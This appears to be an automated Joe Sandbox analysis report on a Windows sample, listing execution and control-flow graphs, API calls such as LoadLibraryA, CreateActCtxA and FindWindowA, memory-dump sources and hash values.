                                        • Instruction ID: 4ddf92791a5b43e1baea04a283836b569fe92d5d5e17e0139d4d003dc21d2a35
                                        • Opcode Fuzzy Hash: 9514fc1bb1cc25f491de601e40aa317d03148fdbbbb3ea0ae0adc63f208d9b49
                                        • Instruction Fuzzy Hash: 1011AF76504380DFCB05CF10D9C4B56BF72FB94320F28C6A9D8084B616C33AE85ACBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.570767939.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a60000_JeCXrQSehB.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b149538ca676b209c59803d97b69e45ecbca51b56ad86305bcfd1e9208fdc4d6
                                        • Instruction ID: 7929c50852fa36f535dce86d4558c051c5ebe389e10ae6fa7ad68dd887e42403
                                        • Opcode Fuzzy Hash: b149538ca676b209c59803d97b69e45ecbca51b56ad86305bcfd1e9208fdc4d6
                                        • Instruction Fuzzy Hash: 34917A74E00219DFDF10CFA9D9857EEBBF2AF88318F248129E415A7294EB749845CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Execution Graph

                                        Execution Coverage:11.3%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:0%
                                        Total number of Nodes:20
                                        Total number of Limit Nodes:1
                                        execution_graph 12936 2780448 12937 2780452 12936->12937 12939 2781db0 12936->12939 12940 2781dd5 12939->12940 12944 2781eb0 12940->12944 12948 2781ea0 12940->12948 12945 2781ed7 12944->12945 12947 2781fb4 12945->12947 12952 2781b2c 12945->12952 12949 2781ed7 12948->12949 12950 2781b2c CreateActCtxA 12949->12950 12951 2781fb4 12949->12951 12950->12951 12953 2782f40 CreateActCtxA 12952->12953 12955 2783003 12953->12955 12928 278ae90 12929 278aeae 12928->12929 12932 27892a0 12929->12932 12931 278aee5 12934 278c9b0 LoadLibraryA 12932->12934 12935 278caa9 12934->12935

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 278c9a6-278c9ad 1 278c9af-278ca07 0->1 2 278c993-278c9a4 0->2 3 278ca09-278ca2e 1->3 4 278ca5b-278caa7 LoadLibraryA 1->4 2->0 3->4 9 278ca30-278ca32 3->9 7 278caa9-278caaf 4->7 8 278cab0-278cae1 4->8 7->8 14 278caf1 8->14 15 278cae3-278cae7 8->15 11 278ca34-278ca3e 9->11 12 278ca55-278ca58 9->12 16 278ca40 11->16 17 278ca42-278ca51 11->17 12->4 20 278caf2 14->20 15->14 18 278cae9 15->18 16->17 17->17 19 278ca53 17->19 18->14 19->12 20->20
                                        APIs
                                        • LoadLibraryA.KERNELBASE(?), ref: 0278CA97
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.570365819.0000000002780000.00000040.00000800.00020000.00000000.sdmp, Offset: 02780000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_2780000_Client.jbxd
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID: +ePt$+ePt
                                        • API String ID: 1029625771-763183150
                                        • Opcode ID: be540ab32d460fd423dd37dbe2c4d2a37d50605e50b1ee1be3afc951d27ea79e
                                        • Instruction ID: 497e65dc38cb57e8d1048ecd9c701e01a03663e85e95f8c9b18d9e2137e31513
                                        • Opcode Fuzzy Hash: be540ab32d460fd423dd37dbe2c4d2a37d50605e50b1ee1be3afc951d27ea79e
                                        • Instruction Fuzzy Hash: 2141A9B0E002488FCB15DFA9D88578EBFF0EB08304F14816AE815EB381D7749846CFA6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 21 27892a0-278ca07 23 278ca09-278ca2e 21->23 24 278ca5b-278caa7 LoadLibraryA 21->24 23->24 29 278ca30-278ca32 23->29 27 278caa9-278caaf 24->27 28 278cab0-278cae1 24->28 27->28 34 278caf1 28->34 35 278cae3-278cae7 28->35 31 278ca34-278ca3e 29->31 32 278ca55-278ca58 29->32 36 278ca40 31->36 37 278ca42-278ca51 31->37 32->24 40 278caf2 34->40 35->34 38 278cae9 35->38 36->37 37->37 39 278ca53 37->39 38->34 39->32 40->40
                                        APIs
                                        • LoadLibraryA.KERNELBASE(?), ref: 0278CA97
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.570365819.0000000002780000.00000040.00000800.00020000.00000000.sdmp, Offset: 02780000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_2780000_Client.jbxd
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID: +ePt$+ePt
                                        • API String ID: 1029625771-763183150
                                        • Opcode ID: 3d9934000cb6fb697d99cc3059207aea9ca3192baba8e278a4448b623417237a
                                        • Instruction ID: 5cc6045a258f25009bef20516bfeee90092b306edb6eb5e8e8c4b66ce1557a78
                                        • Opcode Fuzzy Hash: 3d9934000cb6fb697d99cc3059207aea9ca3192baba8e278a4448b623417237a
                                        • Instruction Fuzzy Hash: A34166B0E406188FDB15DFA9D88479EBBF1EB48304F10812AE815FB384D7749846CFA6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 41 2782f34-2782f3d 42 2782fb9-2783001 CreateActCtxA 41->42 43 2782f3f-2782fb8 41->43 45 278300a-2783064 42->45 46 2783003-2783009 42->46 43->42 53 2783073-2783077 45->53 54 2783066-2783069 45->54 46->45 55 2783088 53->55 56 2783079-2783085 53->56 54->53 58 2783089 55->58 56->55 58->58
                                        APIs
                                        • CreateActCtxA.KERNEL32(?), ref: 02782FF1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.570365819.0000000002780000.00000040.00000800.00020000.00000000.sdmp, Offset: 02780000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_2780000_Client.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID: +ePt
                                        • API String ID: 2289755597-4122482329
                                        • Opcode ID: a083e3a5ff6a06759cc173252a5ab97e80e643773d6294f7ac7d61ac347a4c75
                                        • Instruction ID: 2c89ceff095f8ece15a085f1a0f27b5902956d80ec8f5b3a6b475234ab0abeef
                                        • Opcode Fuzzy Hash: a083e3a5ff6a06759cc173252a5ab97e80e643773d6294f7ac7d61ac347a4c75
                                        • Instruction Fuzzy Hash: 274121B1C04758CBDB24DFA9C884BDEFBB2BF89304F218169D409AB251DB716946CF91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 59 2781b2c-2783001 CreateActCtxA 62 278300a-2783064 59->62 63 2783003-2783009 59->63 70 2783073-2783077 62->70 71 2783066-2783069 62->71 63->62 72 2783088 70->72 73 2783079-2783085 70->73 71->70 75 2783089 72->75 73->72 75->75
                                        APIs
                                        • CreateActCtxA.KERNEL32(?), ref: 02782FF1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.570365819.0000000002780000.00000040.00000800.00020000.00000000.sdmp, Offset: 02780000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_2780000_Client.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID: +ePt
                                        • API String ID: 2289755597-4122482329
                                        • Opcode ID: a223a5558d9057b196f04318a4fa741c35e06a12157028646a7a9d880ec63ecb
                                        • Instruction ID: 8f59d7900f948f9a2852f621b60ff7649edcb81ae3a43d924b2adc0420265e64
                                        • Opcode Fuzzy Hash: a223a5558d9057b196f04318a4fa741c35e06a12157028646a7a9d880ec63ecb
                                        • Instruction Fuzzy Hash: 684123B0D0475CCBDB24DFA9C884BDEBBB1BF89308F218069D409AB251DB716946CF91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.569364302.0000000000EFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EFD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_efd000_Client.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ce5c0e171ec7d08214eec4e41a45b4280f8155ab893086d28e704ea0e0402812
                                        • Instruction ID: fa128264ef7324505093416de5bb9353175a4d41df518e258e89a3e85dc97466
                                        • Opcode Fuzzy Hash: ce5c0e171ec7d08214eec4e41a45b4280f8155ab893086d28e704ea0e0402812
                                        • Instruction Fuzzy Hash: 2D2124B1508248DFCB15CF00DCC4F26BFA3FB88318F248569EA096B246C736D816DBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.569139781.0000000000EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EED000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_eed000_Client.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9739c27419309cbec1fd8179baa600b513f77cbd9022a5870151e94bf96147ba
                                        • Instruction ID: c232ae0949990994be4652f41a28af363e54f2f13bf0bff9513765531e4b2f40
                                        • Opcode Fuzzy Hash: 9739c27419309cbec1fd8179baa600b513f77cbd9022a5870151e94bf96147ba
                                        • Instruction Fuzzy Hash: 0D2133B1608288DFCB05CF50DDC4B26BBA5FB8C324F24C569EA056B256C336DC16DBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.569139781.0000000000EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EED000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_eed000_Client.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b5343b6d018942d66b52faa1a70d0395f2c94d001f52fb9f3037a7a2a627ca79
                                        • Instruction ID: cf4e68a793e03cba28071c48be082b743e4c90173351db415a0d8f88e7b7af46
                                        • Opcode Fuzzy Hash: b5343b6d018942d66b52faa1a70d0395f2c94d001f52fb9f3037a7a2a627ca79
                                        • Instruction Fuzzy Hash: 712128B1508388DFDB04CF14DDC0B26BBA5FB98328F248569E9055B246C336DC5ADBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.569364302.0000000000EFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EFD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_efd000_Client.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 42a7c0f86b98f86e627d1f46adb11b25065d8888899e2942d419b83f8f6c1832
                                        • Instruction ID: 3b41b5ead10329c8a5995948b642d980dbf093983e60249b481abf7cf3a0f9af
                                        • Opcode Fuzzy Hash: 42a7c0f86b98f86e627d1f46adb11b25065d8888899e2942d419b83f8f6c1832
                                        • Instruction Fuzzy Hash: A92103B160C248DFEB00DF54DDC4B36BFA6EB84318F24C569DA0A5B256C336D846DAA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.569364302.0000000000EFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EFD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_efd000_Client.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 34d8112e8ce8667013a7870f35b3d6997f7dcf78b8651e8ab0db6efab0675a33
                                        • Instruction ID: a81a78101f929d74fd6f7328dbdb1b5dc6f65d0a4e01579da2a540197a77620d
                                        • Opcode Fuzzy Hash: 34d8112e8ce8667013a7870f35b3d6997f7dcf78b8651e8ab0db6efab0675a33
                                        • Instruction Fuzzy Hash: C321C8B1608248DFDB05DF14DDC4B36BFA6FB84318F24C569DA0A5B246C336E845DB62
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.569364302.0000000000EFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EFD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_efd000_Client.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 67373778bef919e7355b399e1c8862150df986df0c5734566d261607e54b1f0a
                                        • Instruction ID: 3a22c199c6344230da0cc5463704896a11fcc9ca34bc6fc858274d1f13f8597f
                                        • Opcode Fuzzy Hash: 67373778bef919e7355b399e1c8862150df986df0c5734566d261607e54b1f0a
                                        • Instruction Fuzzy Hash: CA2181725093C48FCB038F20D984B16BF72FB46314F2982DAD9449B657C33AD81ACB62
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.569139781.0000000000EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EED000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_eed000_Client.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a4c6ec07900001600012bfa2eea3f7d10988ed4c4f9b3fcaf888016317e9a1ae
                                        • Instruction ID: 8d2fb0a4360dcab277281bcfa76f431654e021b63074d630f038a0b369791cbb
                                        • Opcode Fuzzy Hash: a4c6ec07900001600012bfa2eea3f7d10988ed4c4f9b3fcaf888016317e9a1ae
                                        • Instruction Fuzzy Hash: C021B176508284DFCB06CF54D9C4B16BF71FB88324F24C6A9ED041B656C33AD856CBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.569139781.0000000000EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EED000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_eed000_Client.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9514fc1bb1cc25f491de601e40aa317d03148fdbbbb3ea0ae0adc63f208d9b49
                                        • Instruction ID: 0328b74cfaf1e03a8486c09f2d6fd1c9d33b8ee8ecef2146ec95f6c285efae30
                                        • Opcode Fuzzy Hash: 9514fc1bb1cc25f491de601e40aa317d03148fdbbbb3ea0ae0adc63f208d9b49
                                        • Instruction Fuzzy Hash: 8B11E676508284CFCF11CF14D9C4B16BF71FB98328F24C6A9D8051B616C33AD85ACBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.569364302.0000000000EFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EFD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_efd000_Client.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3554de7e29e871378acaf3a08429c0d2c12c29cff4e332b9d7dcf7fca9d36d6a
                                        • Instruction ID: 5bc18f5f66bcce943dead023b576bbdbdf94b99015c704cd95379dcca41b2028
                                        • Opcode Fuzzy Hash: 3554de7e29e871378acaf3a08429c0d2c12c29cff4e332b9d7dcf7fca9d36d6a
                                        • Instruction Fuzzy Hash: 6611D075508284CFDB01CF50D9C4B25BF72FB84318F24C6AAD9494B666C33AD85ACB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.569364302.0000000000EFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EFD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_efd000_Client.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3554de7e29e871378acaf3a08429c0d2c12c29cff4e332b9d7dcf7fca9d36d6a
                                        • Instruction ID: 2b2153796a118314d9e2a7060657cec32b43d4f264d73d8a9d2d9d9eb25d44a2
                                        • Opcode Fuzzy Hash: 3554de7e29e871378acaf3a08429c0d2c12c29cff4e332b9d7dcf7fca9d36d6a
                                        • Instruction Fuzzy Hash: 64119075508284DFCB11CF14D9C4B25FF72FB44328F24C6A9D9494B656C33AE85ACB51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Execution Graph

                                        Execution Coverage:12.1%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:0%
                                        Total number of Nodes:46
                                        Total number of Limit Nodes:4
                                        execution_graph 18104 b90448 18105 b90452 18104->18105 18110 b91db0 18104->18110 18115 2943f18 18105->18115 18121 2943f03 18105->18121 18106 b904bf 18111 b91dd5 18110->18111 18127 b91eb0 18111->18127 18131 b91ea0 18111->18131 18116 2943f31 18115->18116 18140 29436a4 18116->18140 18118 2943f40 18120 2944270 FindWindowExA 18118->18120 18119 2943f4b 18119->18106 18120->18119 18122 2943f31 18121->18122 18123 29436a4 FindWindowA 18122->18123 18124 2943f40 18123->18124 18144 2944270 18124->18144 18125 2943f4b 18125->18106 18129 b91ed7 18127->18129 18128 b91fb4 18128->18128 18129->18128 18136 b91b2c 18129->18136 18132 b91ddf 18131->18132 18134 b91eaf 18131->18134 18132->18105 18133 b91fb4 18133->18133 18134->18133 18135 b91b2c CreateActCtxA 18134->18135 18135->18133 18137 b92f40 CreateActCtxA 18136->18137 18139 b93003 18137->18139 18142 2944050 FindWindowA 18140->18142 18143 2944194 18142->18143 18145 29442ee 18144->18145 18149 29443e0 18145->18149 18153 29443b8 18145->18153 18146 2944399 18146->18125 18151 29443ee 18149->18151 18150 29437c4 FindWindowExA 18150->18151 18151->18150 18152 29444c8 18151->18152 18152->18146 18155 29443bd 18153->18155 18154 29437c4 FindWindowExA 18154->18155 18155->18154 18156 29444c8 18155->18156 18156->18146 18157 b9ae90 18158 b9aeae 18157->18158 18161 b992a0 18158->18161 18160 b9aee5 18164 b9c9b0 LoadLibraryA 18161->18164 18163 b9caa9 18164->18163

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 657 2944584-29445f8 659 2944631-2944651 657->659 660 29445fa-2944604 657->660 665 2944653-294465d 659->665 666 294468a-294468f 659->666 660->659 661 2944606-2944608 660->661 663 294460a-2944614 661->663 664 294462b-294462e 661->664 667 2944616 663->667 668 2944618-2944627 663->668 664->659 665->666 669 294465f-2944661 665->669 673 2944699-29446dd FindWindowExA 666->673 667->668 668->668 670 2944629 668->670 671 2944684-2944687 669->671 672 2944663-294466d 669->672 670->664 671->666 674 2944671-2944680 672->674 675 294466f 672->675 676 29446e6-294471e 673->676 677 29446df-29446e5 673->677 674->674 678 2944682 674->678 675->674 682 2944720-2944724 676->682 683 294472e-2944732 676->683 677->676 678->671 682->683 684 2944726 682->684 685 2944734-2944738 683->685 686 2944742 683->686 684->683 685->686 687 294473a 685->687 688 2944743 686->688 687->686 688->688
                                        APIs
                                        • FindWindowExA.USER32(?,?,?,?), ref: 029446CD
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.571832416.0000000002940000.00000040.00000800.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2940000_JeCXrQSehB.jbxd
                                        Similarity
                                        • API ID: FindWindow
                                        • String ID:
                                        • API String ID: 134000473-0
                                        • Opcode ID: e470c218659a0b80aabdef3b54410bf824bd3ccb585ed5d05ae574af3cf185a6
                                        • Instruction ID: 64f7e0c8ff74acecf83a2d8a3d17aad802662ab46eb0186ecbe1174732f83b70
                                        • Opcode Fuzzy Hash: e470c218659a0b80aabdef3b54410bf824bd3ccb585ed5d05ae574af3cf185a6
                                        • Instruction Fuzzy Hash: F95152B1D006599FCB10CFA9C985BEEBBB5FB48308F149529E855AB380DB749842CF81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 689 29437bd-29445f8 692 2944631-2944651 689->692 693 29445fa-2944604 689->693 698 2944653-294465d 692->698 699 294468a-294468f 692->699 693->692 694 2944606-2944608 693->694 696 294460a-2944614 694->696 697 294462b-294462e 694->697 700 2944616 696->700 701 2944618-2944627 696->701 697->692 698->699 702 294465f-2944661 698->702 706 2944699-29446dd FindWindowExA 699->706 700->701 701->701 703 2944629 701->703 704 2944684-2944687 702->704 705 2944663-294466d 702->705 703->697 704->699 707 2944671-2944680 705->707 708 294466f 705->708 709 29446e6-294471e 706->709 710 29446df-29446e5 706->710 707->707 711 2944682 707->711 708->707 715 2944720-2944724 709->715 716 294472e-2944732 709->716 710->709 711->704 715->716 717 2944726 715->717 718 2944734-2944738 716->718 719 2944742 716->719 717->716 718->719 720 294473a 718->720 721 2944743 719->721 720->719 721->721
                                        APIs
                                        • FindWindowExA.USER32(?,?,?,?), ref: 029446CD
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.571832416.0000000002940000.00000040.00000800.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2940000_JeCXrQSehB.jbxd
                                        Similarity
                                        • API ID: FindWindow
                                        • String ID:
                                        • API String ID: 134000473-0
                                        • Opcode ID: e24a9dcc61ac120c7a3dbc87ab444f42cf8da37b6332a32bf539c69947f27659
                                        • Instruction ID: d1f1efa5e0b65238499143be870b41e08a3bd6178fb78107f09b5760ab69bab4
                                        • Opcode Fuzzy Hash: e24a9dcc61ac120c7a3dbc87ab444f42cf8da37b6332a32bf539c69947f27659
                                        • Instruction Fuzzy Hash: 42515571E006589FDB10CFA9C945BDEBBF5FB49308F10952AE855AB340DB749842CF81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 722 29437c4-29445f8 725 2944631-2944651 722->725 726 29445fa-2944604 722->726 731 2944653-294465d 725->731 732 294468a-29446dd FindWindowExA 725->732 726->725 727 2944606-2944608 726->727 729 294460a-2944614 727->729 730 294462b-294462e 727->730 733 2944616 729->733 734 2944618-2944627 729->734 730->725 731->732 735 294465f-2944661 731->735 742 29446e6-294471e 732->742 743 29446df-29446e5 732->743 733->734 734->734 736 2944629 734->736 737 2944684-2944687 735->737 738 2944663-294466d 735->738 736->730 737->732 740 2944671-2944680 738->740 741 294466f 738->741 740->740 744 2944682 740->744 741->740 748 2944720-2944724 742->748 749 294472e-2944732 742->749 743->742 744->737 748->749 750 2944726 748->750 751 2944734-2944738 749->751 752 2944742 749->752 750->749 751->752 753 294473a 751->753 754 2944743 752->754 753->752 754->754
                                        APIs
                                        • FindWindowExA.USER32(?,?,?,?), ref: 029446CD
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.571832416.0000000002940000.00000040.00000800.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2940000_JeCXrQSehB.jbxd
                                        Similarity
                                        • API ID: FindWindow
                                        • String ID:
                                        • API String ID: 134000473-0
                                        • Opcode ID: de3b4f7b0382e268351424534c443479aee8a80e432b2293baa456970ed4b700
                                        • Instruction ID: 2f84f028231806ab027715c53b0785544968a3d8a94f2dcd6a3fa1690e0b9c6b
                                        • Opcode Fuzzy Hash: de3b4f7b0382e268351424534c443479aee8a80e432b2293baa456970ed4b700
                                        • Instruction Fuzzy Hash: A05144B1D006599FDB10CFA9C985BEEBBF5FB48308F109529E855AB380DB749842CF81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 755 2944044-29440b1 757 29440b3-29440bd 755->757 758 29440ea-294410a 755->758 757->758 759 29440bf-29440c1 757->759 765 2944143-2944192 FindWindowA 758->765 766 294410c-2944116 758->766 760 29440e4-29440e7 759->760 761 29440c3-29440cd 759->761 760->758 763 29440d1-29440e0 761->763 764 29440cf 761->764 763->763 767 29440e2 763->767 764->763 774 2944194-294419a 765->774 775 294419b-29441d3 765->775 766->765 768 2944118-294411a 766->768 767->760 770 294411c-2944126 768->770 771 294413d-2944140 768->771 772 2944128 770->772 773 294412a-2944139 770->773 771->765 772->773 773->773 776 294413b 773->776 774->775 780 29441d5-29441d9 775->780 781 29441e3-29441e7 775->781 776->771 780->781 784 29441db 780->784 782 29441f7 781->782 783 29441e9-29441ed 781->783 786 29441f8 782->786 783->782 785 29441ef 783->785 784->781 785->782 786->786
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.571832416.0000000002940000.00000040.00000800.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2940000_JeCXrQSehB.jbxd
                                        Similarity
                                        • API ID: FindWindow
                                        • String ID:
                                        • API String ID: 134000473-0
                                        • Opcode ID: 71732a47ec34e269636919142c6ebedee0be17c0dc6e0fed93b82c08ec7bbd11
                                        • Instruction ID: 05ba50e37a26d00616342620eed0dbec674e4082049da8ace7025bcfc41a7535
                                        • Opcode Fuzzy Hash: 71732a47ec34e269636919142c6ebedee0be17c0dc6e0fed93b82c08ec7bbd11
                                        • Instruction Fuzzy Hash: FD514571D006598FDB10CFA8C885B9EBBB5FB58318F149129E855BB284DB749886CF81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 787 29436a4-29440b1 790 29440b3-29440bd 787->790 791 29440ea-294410a 787->791 790->791 792 29440bf-29440c1 790->792 798 2944143-2944192 FindWindowA 791->798 799 294410c-2944116 791->799 793 29440e4-29440e7 792->793 794 29440c3-29440cd 792->794 793->791 796 29440d1-29440e0 794->796 797 29440cf 794->797 796->796 800 29440e2 796->800 797->796 807 2944194-294419a 798->807 808 294419b-29441d3 798->808 799->798 801 2944118-294411a 799->801 800->793 803 294411c-2944126 801->803 804 294413d-2944140 801->804 805 2944128 803->805 806 294412a-2944139 803->806 804->798 805->806 806->806 809 294413b 806->809 807->808 813 29441d5-29441d9 808->813 814 29441e3-29441e7 808->814 809->804 813->814 817 29441db 813->817 815 29441f7 814->815 816 29441e9-29441ed 814->816 819 29441f8 815->819 816->815 818 29441ef 816->818 817->814 818->815 819->819
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.571832416.0000000002940000.00000040.00000800.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2940000_JeCXrQSehB.jbxd
                                        Similarity
                                        • API ID: FindWindow
                                        • String ID:
                                        • API String ID: 134000473-0
                                        • Opcode ID: 1b7032d12a2c5bd5ec5911a79629ff9c7d60f1e86ede47a3b15fde676bd7ff6b
                                        • Instruction ID: 12d6ca75a83c0d7b5e07c74efb24153adf153043c862ab29492d6951a1489b10
                                        • Opcode Fuzzy Hash: 1b7032d12a2c5bd5ec5911a79629ff9c7d60f1e86ede47a3b15fde676bd7ff6b
                                        • Instruction Fuzzy Hash: 125154B1D007598FDB10CFA8C885B9EBBF5FB58318F149129E815BB284DBB49881CF81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 820 b92f34-b92f3d 821 b92eff-b92f2b 820->821 822 b92f3f-b93001 CreateActCtxA 820->822 826 b9300a-b93064 822->826 827 b93003-b93009 822->827 834 b93073-b93077 826->834 835 b93066-b93069 826->835 827->826 836 b93079-b93085 834->836 837 b93088 834->837 835->834 836->837 838 b93089 837->838 838->838
                                        APIs
                                        • CreateActCtxA.KERNEL32(?), ref: 00B92FF1
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.562036965.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_b90000_JeCXrQSehB.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID:
                                        • API String ID: 2289755597-0
                                        • Opcode ID: ace5e4ca834326aabc79f5797ccf6f80dc6efc7692ba69aa6c619966f4e4c747
                                        • Instruction ID: 5c132e9e30ee659f36cf9aebf964c253c1a5e25d14bab18549cec6b438d77257
                                        • Opcode Fuzzy Hash: ace5e4ca834326aabc79f5797ccf6f80dc6efc7692ba69aa6c619966f4e4c747
                                        • Instruction Fuzzy Hash: FE413371C04658CFDB24CFA9C884BDDBBF1BF89314F2081AAD409AB291D7756946CF91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 860 b9c9a6-b9ca07 861 b9ca09-b9ca2e 860->861 862 b9ca5b-b9caa7 LoadLibraryA 860->862 861->862 867 b9ca30-b9ca32 861->867 865 b9caa9-b9caaf 862->865 866 b9cab0-b9cae1 862->866 865->866 872 b9caf1 866->872 873 b9cae3-b9cae7 866->873 869 b9ca55-b9ca58 867->869 870 b9ca34-b9ca3e 867->870 869->862 874 b9ca40 870->874 875 b9ca42-b9ca51 870->875 878 b9caf2 872->878 873->872 877 b9cae9 873->877 874->875 875->875 876 b9ca53 875->876 876->869 877->872 878->878
                                        APIs
                                        • LoadLibraryA.KERNELBASE(?), ref: 00B9CA97
                                        Memory Dump Source
